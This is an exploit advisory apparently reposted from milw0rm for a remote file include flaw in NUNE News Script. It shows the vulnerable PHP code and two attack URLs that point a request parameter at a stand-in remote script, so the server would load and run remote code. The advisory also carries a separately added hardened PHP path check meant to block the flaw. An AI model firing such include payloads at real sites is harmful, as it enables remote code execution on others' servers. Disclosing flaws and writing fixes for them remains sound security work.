
NUNE News Script (custom_admin_path) Remote File Include Vulnerability






-----------------------------------------------

NUNE News Script (custom_admin_path) Remote File Include Vulnerability

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

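// $custom_admin_path can be set from the request (see the URLs below)
if (isset($custom_admin_path))
    $special_admin_path = $custom_admin_path;
else
    $special_admin_path = "news/admin";

// the include path is built from that value without any validation
require("$special_admin_path/config/nune.conf.php");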

-----------------------------------------------

3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript? 
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript? 
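
The snippet above lets a request parameter choose the path handed to require(). A hardened form of the same lookup, as an added example that is not part of the advisory or of NUNE: resolve_admin_path() and the NUNE_ADMIN_PATH constant are hypothetical names, the demo tree and inputs are constructed, and PHP 7.1 or later is assumed.

```php
<?php
// Added example, not NUNE code. resolve_admin_path() is a hypothetical helper.
declare(strict_types=1);

/**
 * Return the real admin directory for $candidate, or throw if it is not a
 * local directory under $baseDir that contains config/nune.conf.php.
 */
function resolve_admin_path(string $candidate, string $baseDir): string
{
    // Refuse URL and stream-wrapper syntax (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate) === 1) {
        throw new InvalidArgumentException('URL or wrapper in admin path');
    }
    // realpath() resolves ../ and symlinks; it returns false if the path is missing.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $candidate);
    if ($base === false || $real === false) {
        throw new InvalidArgumentException('admin path does not exist');
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('admin path escapes the application directory');
    }
    if (!is_file($real . DIRECTORY_SEPARATOR . 'config' . DIRECTORY_SEPARATOR . 'nune.conf.php')) {
        throw new InvalidArgumentException('no nune.conf.php under admin path');
    }
    return $real;
}

// Constructed demo tree so the block runs offline.
$app = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'nune_demo_' . getmypid();
mkdir($app . '/news/admin/config', 0700, true);
file_put_contents($app . '/news/admin/config/nune.conf.php', "<?php\n");

// Constructed inputs: the default, the advisory's parameter value, a traversal.
foreach (['news/admin', 'http://evilscript?', '../../etc'] as $candidate) {
    try {
        echo $candidate, ' => ', resolve_admin_path($candidate, $app), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $candidate, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}

// In the script itself, take the path from a constant (request input cannot
// define one) instead of from $custom_admin_path:
//   $path = defined('NUNE_ADMIN_PATH') ? NUNE_ADMIN_PATH : 'news/admin';
//   require resolve_admin_path($path, __DIR__) . '/config/nune.conf.php';
```

Setting allow_url_include=Off in php.ini (the default since PHP 5.2) blocks remote includes at the interpreter level as well, independent of this check.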

-----------------------------------------------

download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz 

-----------------------------------------------

Greetz: str0ke, kacper, GODAttach

Farewell to nukedx, take care of yourself, my friend..!

-----------------------------------------------

# milw0rm.com [2007-01-06]
